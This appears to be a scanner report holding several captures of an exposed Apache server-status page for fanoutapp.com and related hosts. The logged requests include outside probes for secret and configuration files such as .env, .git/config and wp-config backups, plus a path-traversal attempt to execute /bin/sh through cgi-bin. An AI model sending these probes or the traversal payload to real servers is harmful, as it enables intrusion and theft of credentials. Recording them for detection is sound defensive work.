Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabf605c3505
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2025-04-02T18:34:29 Current Time: Friday, 14-Nov-2025 20:48:53 UTC Restart Time: Tuesday, 16-Sep-2025 22:05:06 UTC Parent Server Config. Generation: 64 Parent Server MPM Generation: 63 Server uptime: 58 days 22 hours 43 minutes 46 seconds Server load: 0.10 0.16 0.17 Total accesses: 101180 - Total Traffic: 305.4 MB - Total Duration: 1271511 CPU Usage: u93.47 s145.87 cu1457.16 cs449.63 - .0421% CPU load .0199 requests/sec - 62 B/second - 3164 B/request - 12.5668 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 11214358no1yes124010 21214234no0yes025000 Sum201 149010 ........................._____________W_________________________ ___________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-62-0/0/1525. 0.00748924220130.00.004.86 127.0.0.1http/1.1api.hnstream.com:8000GET /download/.env.old HTTP/1.1 0-62-0/0/1455. 0.00748921178060.00.004.22 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 0-62-0/0/1498. 0.00748920201680.00.004.19 127.0.0.1http/1.1hnstream.com:8000GET /.env HTTP/1.1 0-62-0/0/1520. 0.007489210177000.00.004.95 104.156.93.96http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-62-0/0/1474. 0.00748920182690.00.004.31 127.0.0.1http/1.1hnstream.com:8000GET /robots.txt HTTP/1.1 0-62-0/0/1501. 0.00748927182450.00.005.04 127.0.0.1http/1.1api.hnstream.com:8000GET /.git/config HTTP/1.1 0-62-0/0/1480. 0.007489217171760.00.004.39 127.0.0.1http/1.1api.hnstream.com:8000GET /.env HTTP/1.1 0-62-0/0/1501. 0.007489238188880.00.004.84 127.0.0.1http/1.1chat.fanoutapp.com:8000GET / HTTP/1.1 0-62-0/0/1501. 0.00748929157640.00.004.69 198.235.24.51http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-62-0/0/1492. 0.007489221159720.00.003.98 198.235.24.51http/1.1 0-62-0/0/1502. 0.007489237177970.00.004.15 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /.env HTTP/1.1 0-62-0/0/1482. 0.007489214176400.00.004.39 104.156.93.96http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-62-0/0/1500. 0.007489264188330.00.004.53 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /robots.txt HTTP/1.1 0-62-0/0/1461. 0.007489210147470.00.004.20 178.22.24.11http/1.1api.hnstream.com:8000\x16\x03\x01\x02 0-62-0/0/1498. 0.007489222143610.00.004.18 140.248.87.69http/1.1api.livecounter.org:8000POST /counters/1/ HTTP/1.1 0-62-0/0/1471. 0.007489216160410.00.004.56 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-62-0/0/1471. 0.007489217150270.00.004.13 140.248.67.118http/1.1api.livecounter.org:8000POST /counters/1/ HTTP/1.1 0-62-0/0/1485. 0.00748924143560.00.004.15 147.185.132.83http/1.1api.hnstream.com:8000\x16\x03\x01 0-62-0/0/1494. 0.00748927196400.00.004.44 104.156.93.96http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-62-0/0/1482. 0.007489254141050.00.004.23 127.0.0.1http/1.1api.hnstream.com:8000GET /bins/ HTTP/1.1 0-62-0/0/1430. 0.00748922145770.00.004.42 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-62-0/0/1491. 0.007489256152910.00.004.25 104.156.93.96http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-62-0/0/1473. 0.00748921154480.00.004.39 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 0-62-0/0/1513. 0.00748920173670.00.004.47 127.0.0.1http/1.1hnstream.com:8000GET /robots.txt HTTP/1.1 0-62-0/0/1481. 0.00748924139660.00.004.38 127.0.0.1http/1.1api.hnstream.com:8000GET /helper/config.env HTTP/1.1 1-6312143580/46/1303_ 1.11233220570.00.114.24 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/index.html HTTP/1.1 1-6312143580/33/1275_ 1.11173144410.00.063.51 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger.json HTTP/1.1 1-6312143580/42/1264_ 1.11163143320.00.084.05 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/v1/swagger.json HTTP/1.1 1-6312143580/39/1266_ 1.11153141750.00.073.46 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/api-docs HTTP/1.1 1-6312143580/41/1300_ 1.13133144820.00.154.14 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /@vite/env HTTP/1.1 1-6312143580/47/1290_ 1.13143147930.00.093.59 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v3/api-docs HTTP/1.1 1-6312143580/41/1262_ 1.13103167910.00.074.16 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 1-6312143580/41/1293_ 1.13103143210.00.083.69 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 1-6312143580/38/1263_ 1.1393152780.00.074.04 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 1-6312143580/37/1284_ 1.1383173130.00.073.53 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-6312143580/36/1287_ 1.1343141820.00.073.58 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 1-6312143580/38/1258_ 1.1303141330.00.073.65 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-6312143580/35/1270_ 1.1324160170.00.073.78 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 1-63121435823/34/1260W 1.1100184860.00.144.37 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 1-6312143580/43/1243_ 1.10510143540.00.153.60 127.0.0.1http/1.1hnstream.com:8000GET /yanki.php HTTP/1.1 1-6312143580/41/1287_ 1.11274148410.00.083.82 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /graphql HTTP/1.1 1-6312143580/36/1256_ 1.10280138770.00.074.42 127.0.0.1http/1.1hnstream.com:8000GET /bolt.php HTTP/1.1 1-6312143580/36/1284_ 1.11264144860.00.073.77 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api/graphql HTTP/1.1 1-6312143580/40/1292_ 1.112815138570.00.144.19 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET / HTTP/1.1 1-6312143580/37/1270_ 1.11263137040.00.074.06 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api HTTP/1.1 1-6312143580/43/1268_ 1.11243132800.00.153.99 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger-ui.html HTTP/1.1 1-6312143580/40/1249_ 1.11253140160.00.153.87 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /graphql/api HTTP/1.1 1-6312143580/41/1267_ 1.11243150740.00.073.65 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api/gql HTTP/1.1 1-6312143580/43/1293_ 1.11203139150.00.254.09 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /webjars/swagger-ui/index.html HTTP/1.1 1-6312143580/38/1255_ 1.11213148790.00.104.00 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/s
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabf446de9cd
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2025-04-02T18:34:29 Current Time: Wednesday, 12-Nov-2025 20:20:57 UTC Restart Time: Tuesday, 16-Sep-2025 22:05:06 UTC Parent Server Config. Generation: 62 Parent Server MPM Generation: 61 Server uptime: 56 days 22 hours 15 minutes 50 seconds Server load: 0.11 0.17 0.17 Total accesses: 97926 - Total Traffic: 297.2 MB - Total Duration: 1245524 CPU Usage: u89.81 s140.31 cu1402.54 cs431.63 - .042% CPU load .0199 requests/sec - 63 B/second - 3182 B/request - 12.719 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 11026992no0yes025000 21026991no1yes124010 Sum201 149010 .........................___________________________________W___ ___________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-58-0/0/1497. 0.00319732147211710.00.004.71 157.52.109.37http/1.1api.hnstream.com:8000GET /frontend_dev.php/$ HTTP/1.1 0-58-0/0/1429. 0.00319732232175930.00.004.10 157.52.109.37http/1.1api.hnstream.com:8000GET /php-info.php HTTP/1.1 0-58-0/0/1471. 0.00319732170199460.00.004.13 157.52.109.37http/1.1api.hnstream.com:8000GET /.wp-config.php.swp HTTP/1.1 0-58-0/0/1490. 0.00319732401175250.00.004.82 157.52.109.37http/1.1api.hnstream.com:8000GET /app_dev.php/_profiler/phpinfo HTTP/1.1 0-58-0/0/1445. 0.00319732385180740.00.004.19 157.52.109.37http/1.1api.hnstream.com:8000GET /config/database.config.php HTTP/1.1 0-58-0/0/1469. 0.00319732331179230.00.004.95 157.52.109.37http/1.1api.hnstream.com:8000GET /config/autoload/local.php HTTP/1.1 0-58-0/0/1456. 0.00319732400170010.00.004.26 157.52.109.37http/1.1api.hnstream.com:8000GET /application/config/migration.php HTTP/1.1 0-58-0/0/1474. 0.00319732436187540.00.004.75 157.52.109.37http/1.1api.hnstream.com:8000GET /config/paths.php HTTP/1.1 0-58-0/0/1472. 0.00319732390155480.00.004.64 157.52.109.37http/1.1api.hnstream.com:8000GET /config/routes.php HTTP/1.1 0-58-0/0/1462. 0.00319732257157400.00.003.92 157.52.109.37http/1.1api.hnstream.com:8000GET /old_phpinfo.php HTTP/1.1 0-58-0/0/1474. 0.00319732164176160.00.004.08 157.52.109.37http/1.1api.hnstream.com:8000GET /private/env.json HTTP/1.1 0-58-0/0/1459. 0.00319732422175170.00.004.27 157.52.109.37http/1.1api.hnstream.com:8000GET /config/services.php HTTP/1.1 0-58-0/0/1474. 0.00319732261185940.00.004.47 157.52.109.37http/1.1api.hnstream.com:8000GET /.remote HTTP/1.1 0-58-0/0/1434. 0.00319732207145550.00.004.14 157.52.109.37http/1.1api.hnstream.com:8000GET /prevlaravel/sftp-config.json HTTP/1.1 0-58-0/0/1466. 0.00319732417140070.00.004.10 157.52.109.37http/1.1api.hnstream.com:8000GET /config/app_local.php HTTP/1.1 0-58-0/0/1445. 0.00319732116157920.00.004.49 157.52.109.37http/1.1api.hnstream.com:8000GET /wp-config.php.old HTTP/1.1 0-58-0/0/1442. 0.0031973245147650.00.003.98 157.52.109.37http/1.1api.hnstream.com:8000GET /sftp.json HTTP/1.1 0-58-0/0/1460. 0.00319732345138590.00.004.09 157.52.109.37http/1.1api.hnstream.com:8000GET /config/cli_bootstrap.php HTTP/1.1 0-58-0/0/1463. 0.00319732400194290.00.004.37 157.52.109.37http/1.1api.hnstream.com:8000GET /application/config/email.php HTTP/1.1 0-58-0/0/1446. 0.00319732414139180.00.004.17 157.52.109.37http/1.1api.hnstream.com:8000GET /application/config/constants.php HTTP/1.1 0-58-0/0/1404. 0.00319732101144990.00.004.36 157.52.109.37http/1.1api.hnstream.com:8000GET /application/config/constants.php/ HTTP/1.1 0-58-0/0/1467. 0.00319732321151430.00.004.13 157.52.109.37http/1.1api.hnstream.com:8000GET /config/bootstrap.php HTTP/1.1 0-58-0/0/1439. 0.00319732190146380.00.004.31 157.52.109.37http/1.1api.hnstream.com:8000GET /config/env.php HTTP/1.1 0-58-0/0/1486. 0.00319732344172240.00.004.41 157.52.109.37http/1.1api.hnstream.com:8000GET /config/test.config.php HTTP/1.1 0-58-0/0/1450. 0.00319732384138160.00.004.32 157.52.109.37http/1.1api.hnstream.com:8000GET /application/config/mimes.php HTTP/1.1 1-6110269920/19/1253_ 0.6812505213090.00.034.13 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /@vite/env HTTP/1.1 1-6110269920/23/1237_ 0.6812503143250.00.043.45 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /api/swagger.json HTTP/1.1 1-6110269920/19/1217_ 0.68653135460.00.103.89 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /api-docs/swagger.json HTTP/1.1 1-6110269920/15/1221_ 0.6912494132810.00.033.38 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /actuator/env HTTP/1.1 1-6110269920/23/1254_ 0.6912484142250.00.043.99 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-6110269920/15/1240_ 0.6912493146220.00.033.50 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /server HTTP/1.1 1-6110269920/23/1217_ 0.70650165680.00.124.08 127.0.0.1http/1.1api.hnstream.com:8000POST /cgi-bin/../../../../../../../../../../bin/sh HTTP/1.1 1-6110269920/22/1248_ 0.6912483140910.00.043.61 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /about HTTP/1.1 1-6110269920/18/1219_ 0.6912474150690.00.113.96 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 1-6110269920/20/1242_ 0.6912473171640.00.113.46 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 1-6110269920/21/1246_ 0.6912453139810.00.113.51 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /login.action HTTP/1.1 1-6110269920/20/1217_ 0.6912463138620.00.113.58 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /server-status HTTP/1.1 1-6110269920/16/1229_ 0.6912463158280.00.033.70 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-6110269920/19/1222_ 0.6912455177180.00.044.23 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /_all_dbs HTTP/1.1 1-6110269920/23/1195_ 0.7012454140680.00.103.45 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.DS_Store HTTP/1.1 1-6110269920/19/1242_ 0.7012443141050.00.043.73 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.env HTTP/1.1 1-6110269920/21/1217_ 0.7012447135760.00.044.34 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.git/config HTTP/1.1 1-6110269920/22/1243_ 0.7012433141910.00.123.69 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /s/1393e2932313e2130313e2135313/_/;/META-INF/maven/com.atla 1-6110269920/24/1247_ 0.7012434135910.00.074.04 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /telescope/requests HTTP/1.1 1-6110269920/20/1231_ 0.7012434135220.00.043.99 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /config.json HTTP/1.1 1-6110269920/23/1220_ 0.7012424130670.00.043.83 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /info.php HTTP/1.1 1-6110269920/18/1207_ 0.7012422137570.00.123.72 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /?rest_route=/wp/v2/users/ HTTP/1.1 1-6110269920/21/1222_ 0.671237314870
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabfb87012e5
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2025-04-02T18:34:29 Current Time: Tuesday, 11-Nov-2025 01:36:22 UTC Restart Time: Tuesday, 16-Sep-2025 22:05:06 UTC Parent Server Config. Generation: 61 Parent Server MPM Generation: 60 Server uptime: 55 days 3 hours 31 minutes 15 seconds Server load: 0.35 0.21 0.18 Total accesses: 94193 - Total Traffic: 287.0 MB - Total Duration: 1216400 CPU Usage: u85.5 s134.84 cu1372.98 cs422.46 - .0423% CPU load .0198 requests/sec - 63 B/second - 3195 B/request - 12.9139 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 1935202no1yes124000 2935201no0yes025000 Sum201 149000 ........................._______________W_______________________ ___________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-58-0/0/1497. 0.00165858147211710.00.004.71 157.52.109.37http/1.1api.hnstream.com:8000GET /frontend_dev.php/$ HTTP/1.1 0-58-0/0/1429. 0.00165858232175930.00.004.10 157.52.109.37http/1.1api.hnstream.com:8000GET /php-info.php HTTP/1.1 0-58-0/0/1471. 0.00165858170199460.00.004.13 157.52.109.37http/1.1api.hnstream.com:8000GET /.wp-config.php.swp HTTP/1.1 0-58-0/0/1490. 0.00165858401175250.00.004.82 157.52.109.37http/1.1api.hnstream.com:8000GET /app_dev.php/_profiler/phpinfo HTTP/1.1 0-58-0/0/1445. 0.00165858385180740.00.004.19 157.52.109.37http/1.1api.hnstream.com:8000GET /config/database.config.php HTTP/1.1 0-58-0/0/1469. 0.00165858331179230.00.004.95 157.52.109.37http/1.1api.hnstream.com:8000GET /config/autoload/local.php HTTP/1.1 0-58-0/0/1456. 0.00165858400170010.00.004.26 157.52.109.37http/1.1api.hnstream.com:8000GET /application/config/migration.php HTTP/1.1 0-58-0/0/1474. 0.00165858436187540.00.004.75 157.52.109.37http/1.1api.hnstream.com:8000GET /config/paths.php HTTP/1.1 0-58-0/0/1472. 0.00165858390155480.00.004.64 157.52.109.37http/1.1api.hnstream.com:8000GET /config/routes.php HTTP/1.1 0-58-0/0/1462. 0.00165858257157400.00.003.92 157.52.109.37http/1.1api.hnstream.com:8000GET /old_phpinfo.php HTTP/1.1 0-58-0/0/1474. 0.00165858164176160.00.004.08 157.52.109.37http/1.1api.hnstream.com:8000GET /private/env.json HTTP/1.1 0-58-0/0/1459. 0.00165858422175170.00.004.27 157.52.109.37http/1.1api.hnstream.com:8000GET /config/services.php HTTP/1.1 0-58-0/0/1474. 0.00165858261185940.00.004.47 157.52.109.37http/1.1api.hnstream.com:8000GET /.remote HTTP/1.1 0-58-0/0/1434. 0.00165858207145550.00.004.14 157.52.109.37http/1.1api.hnstream.com:8000GET /prevlaravel/sftp-config.json HTTP/1.1 0-58-0/0/1466. 0.00165858417140070.00.004.10 157.52.109.37http/1.1api.hnstream.com:8000GET /config/app_local.php HTTP/1.1 0-58-0/0/1445. 0.00165858116157920.00.004.49 157.52.109.37http/1.1api.hnstream.com:8000GET /wp-config.php.old HTTP/1.1 0-58-0/0/1442. 0.0016585845147650.00.003.98 157.52.109.37http/1.1api.hnstream.com:8000GET /sftp.json HTTP/1.1 0-58-0/0/1460. 0.00165858345138590.00.004.09 157.52.109.37http/1.1api.hnstream.com:8000GET /config/cli_bootstrap.php HTTP/1.1 0-58-0/0/1463. 0.00165858400194290.00.004.37 157.52.109.37http/1.1api.hnstream.com:8000GET /application/config/email.php HTTP/1.1 0-58-0/0/1446. 0.00165858414139180.00.004.17 157.52.109.37http/1.1api.hnstream.com:8000GET /application/config/constants.php HTTP/1.1 0-58-0/0/1404. 0.00165858101144990.00.004.36 157.52.109.37http/1.1api.hnstream.com:8000GET /application/config/constants.php/ HTTP/1.1 0-58-0/0/1467. 0.00165858321151430.00.004.13 157.52.109.37http/1.1api.hnstream.com:8000GET /config/bootstrap.php HTTP/1.1 0-58-0/0/1439. 0.00165858190146380.00.004.31 157.52.109.37http/1.1api.hnstream.com:8000GET /config/env.php HTTP/1.1 0-58-0/0/1486. 0.00165858344172240.00.004.41 157.52.109.37http/1.1api.hnstream.com:8000GET /config/test.config.php HTTP/1.1 0-58-0/0/1450. 0.00165858384138160.00.004.32 157.52.109.37http/1.1api.hnstream.com:8000GET /application/config/mimes.php HTTP/1.1 1-609352020/2/1203_ 0.0713207680.00.003.97 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/v1/swagger.json HTTP/1.1 1-609352020/2/1187_ 0.0613133110.00.003.34 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /graphql/api HTTP/1.1 1-609352020/2/1167_ 0.0715130880.00.003.65 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/api-docs HTTP/1.1 1-609352020/3/1176_ 0.0817129570.00.013.29 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v3/api-docs HTTP/1.1 1-609352020/2/1197_ 0.0805134840.00.003.81 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /api-docs/swagger.json HTTP/1.1 1-609352020/2/1193_ 0.0804142350.00.003.40 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /api/swagger.json HTTP/1.1 1-609352020/3/1162_ 0.0805162980.00.013.90 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /@vite/env HTTP/1.1 1-609352020/1/1189_ 0.0803137730.00.003.42 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 1-609352020/4/1165_ 0.0804147700.00.013.76 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 1-609352020/1/1191_ 0.0805168870.00.003.28 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 1-609352020/1/1196_ 0.0805131140.00.003.34 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-609352020/4/1160_ 0.0803134360.00.013.39 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 1-609352020/2/1179_ 0.0805152300.00.003.49 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 1-609352020/3/1174_ 0.0803173820.00.014.11 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 1-609352020/2/1148_ 0.0805137140.00.003.29 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-6093520226/2/1185W 0.0500136250.00.003.59 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 1-609352020/2/1162_ 0.0525126130.00.004.06 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /graphql HTTP/1.1 1-609352020/2/1186_ 0.0614137470.00.003.49 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api HTTP/1.1 1-609352020/2/1182_ 0.0615126400.00.003.88 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api/graphql HTTP/1.1 1-609352020/3/1175_ 0.0715129010.00.013.87 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger.json HTTP/1.1 1-609352020/1/1166_ 0.0714127530.00.003.72 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /webjars/swagger-ui/index.html HTTP/1.1 1-609352020/3/1163_ 0.0714134760.00.013.52 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/swagger-ui.html HTTP/1.1 1-609352020/2/1164_ 0.0714145090.00.003.46 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/index.html HTTP/1.1 1-60935202
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabfd2414356
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2025-04-02T18:34:29 Current Time: Saturday, 08-Nov-2025 22:22:29 UTC Restart Time: Tuesday, 16-Sep-2025 22:05:06 UTC Parent Server Config. Generation: 58 Parent Server MPM Generation: 57 Server uptime: 53 days 17 minutes 22 seconds Server load: 0.11 0.18 0.17 Total accesses: 89561 - Total Traffic: 275.2 MB - Total Duration: 1127548 CPU Usage: u83.13 s129.73 cu1285.07 cs393.39 - .0413% CPU load .0196 requests/sec - 63 B/second - 3221 B/request - 12.5897 ms/request 1 requests currently being processed, 74 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0651179no0yes025000 2651986no0yes025000 3652014no1yes124010 Sum301 174010 _________________________.........................______________ ______________________________W_____............................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-576511790/23/1484_ 0.6034797207150.00.054.69 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /rooms/default/events/?link=next&recover=true&es-meta=eyJ0e 0-576511790/16/1418_ 0.65348412167060.00.044.07 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /rooms/default/events/?link=next&recover=true&es-meta=eyJ0e 0-576511790/20/1461_ 0.60727922194530.00.054.11 157.52.72.64http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-576511790/16/1478_ 0.6531246167560.00.044.80 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /rooms/default/events/?link=next&recover=true&es-meta=eyJ0e 0-576511790/19/1434_ 0.5976747172330.00.044.16 157.52.72.64http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-576511790/17/1455_ 0.65364827171080.00.114.85 209.38.232.238http/1.1api.hnstream.com:8000\x16\x03\x01 0-576511790/20/1446_ 0.5915994161640.00.054.24 66.132.153.126http/1.1api.hnstream.com:8000PRI * HTTP/2.0 0-576511790/20/1460_ 0.6715648178210.00.054.73 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /rooms/default/events/?link=next&recover=true&es-meta=eyJ0e 0-576511790/20/1460_ 0.6530047149140.00.054.61 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /rooms/default/events/?link=next&recover=true&es-meta=eyJ0e 0-576511790/22/1450_ 0.6716042149150.00.053.89 127.0.0.1http/1.1api.hnstream.com:8000POST / HTTP/1.1 0-576511790/19/1459_ 0.6476791169490.00.054.04 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 0-576511790/18/1447_ 0.6037198166170.00.044.24 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /rooms/default/events/?link=next&recover=true&es-meta=eyJ0e 0-576511790/20/1459_ 0.6031194175020.00.044.43 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-576511790/15/1421_ 0.65495335138860.00.114.11 140.248.74.178http/1.1api.livecounter.org:8000GET /robots.txt HTTP/1.1 0-576511790/15/1455_ 0.61299910132140.00.034.07 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /rooms/default/events/?link=next&recover=true&es-meta=eyJ0e 0-576511790/18/1433_ 0.59155921152950.00.044.46 66.132.153.126http/1.1api.hnstream.com:8000GET /robots.txt HTTP/1.1 0-576511790/21/1434_ 0.6618570144100.00.053.89 3.130.96.91http/1.1api.hnstream.com:8000\n 0-576511790/18/1447_ 0.66160420130920.00.124.06 127.0.0.1http/1.1api.hnstream.com:8000GET /.env HTTP/1.1 0-576511790/14/1451_ 0.6537248176180.00.044.35 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /rooms/default/events/?link=next&recover=true&es-meta=eyJ0e 0-576511790/21/1436_ 0.6620481132210.00.054.14 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 0-576511790/16/1396_ 0.6120438140540.00.044.34 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /rooms/default/events/?link=next&recover=true&es-meta=eyJ0e 0-576511790/19/1455_ 0.6049489144440.00.044.11 157.52.72.64http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-576511790/16/1427_ 0.64728426140330.00.044.29 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-576511790/17/1475_ 0.6118579167730.00.044.39 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /rooms/default/events/?link=next&recover=true&es-meta=eyJ0e 0-576511790/18/1437_ 0.6036486132140.00.044.22 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /rooms/default/events/?link=next&recover=true&es-meta=eyJ0e 1-57-0/0/1129. 0.0079973379193120.00.003.69 157.52.109.26http/1.1api.hnstream.com:8000GET /.env.bak HTTP/1.1 1-57-0/0/1122. 0.0079973280124100.00.003.22 157.52.109.54http/1.1api.hnstream.com:8000GET /dashboard/phpinfo.php HTTP/1.1 1-57-0/0/1095. 